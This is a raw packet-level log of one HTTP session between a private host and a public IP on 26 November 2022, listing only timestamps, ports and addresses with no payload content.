Nov 26, 2022 11:17:42.612128019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612140894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612148046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612165928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612179041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612220049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612241030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612256050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612256050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612273932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612293005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612293005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612312078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612315893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612329960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612344027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612365007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612379074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612396955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612416029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612437963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612476110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612566948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613015890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613039017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613060951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613081932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613095045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613106012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613123894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613128901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613143921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613162994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613183975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613188982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613204002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613225937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613229990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613248110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613256931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613266945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613286018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613291979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613306046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613323927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613327026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613348961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613368034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613385916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613393068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613405943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613415003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613425016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613445044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613445044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613464117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613497972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613698959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.613914013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613933086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613951921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613970041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.613995075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614017010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614054918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614074945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614084005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614094019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614094973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614113092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614130974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614147902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614149094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614186049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614209890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614228964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614248037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614248991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614276886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614294052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614314079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614320993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614335060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614345074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614370108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614379883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614398003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614415884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614449024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614526987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614546061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614563942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614574909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614581108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614598989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614609957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614617109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614634991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.614654064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.614684105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615044117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615080118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615101099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615120888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615139008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615153074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615159988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615178108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615180016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615195990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615201950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615215063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615235090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615245104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615255117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615273952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615293026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615303040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615312099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615330935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615333080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615350008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615350008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615369081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615427017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615494967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615514994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615533113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615539074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615552902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615571976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615586042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.615591049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.615636110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616130114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616149902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616168976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616188049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616199017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616234064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616309881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616328955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616347075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616364956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616379023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616384029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616390944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616401911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616420031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616430998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616436958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616455078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616472960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616483927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616489887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616508007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616517067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616524935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616540909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616543055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616559982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616575956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616578102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616595030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616596937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616619110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616652012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616652966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616672993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616692066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616712093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616719007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616730928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616749048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616750956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616767883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616787910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616790056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616806984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616807938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616827965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616847038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616847038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616867065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616885900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616888046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616904974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616924047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616944075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616946936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616961956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616966963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.616981983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.616997004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617001057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617018938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617038965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617048979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617058992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617079020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617096901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617099047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617115974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617124081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617135048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617152929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617153883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617171049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617189884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617206097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617208958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617227077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617230892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617269039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617289066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617306948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617309093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617326021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617332935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617346048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617363930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617367983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617377996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617397070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617413998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617414951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617429972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617433071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617451906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617470980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617471933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617489100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617508888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617527962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617530107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617546082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617566109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617567062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617583990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617597103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617605925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617624998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617625952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617644072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617660999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617665052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617682934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617701054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617717028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617721081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617738962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617746115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617758036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617778063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617779970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617795944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617815018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617816925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617835999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617854118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617868900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617872953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617891073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617892981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617909908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617928982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617928982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617949009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617966890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.617968082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.617988110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618006945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618021965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618025064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618043900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618046045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618062973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618082047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618100882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618108034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618120909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618128061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618139982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618160009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618160963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618179083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618196964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618216038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618218899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618235111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618242025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618253946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618273973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618277073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618293047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618310928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618329048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618340969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618347883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618360043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618367910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618386984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618391037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618406057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618424892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618441105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618443012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618463993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618477106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618482113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618500948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618505955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618519068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618532896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618537903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618556976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618576050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618594885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618602037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618614912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618617058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618633032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618653059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618654013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.618670940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.618716002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619095087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619143009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619160891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619164944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619179964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619205952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619237900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619297028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619317055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619335890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619344950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619354010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619364023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619374990 CET	80	49707	66.235.200.147	192.168.2.5
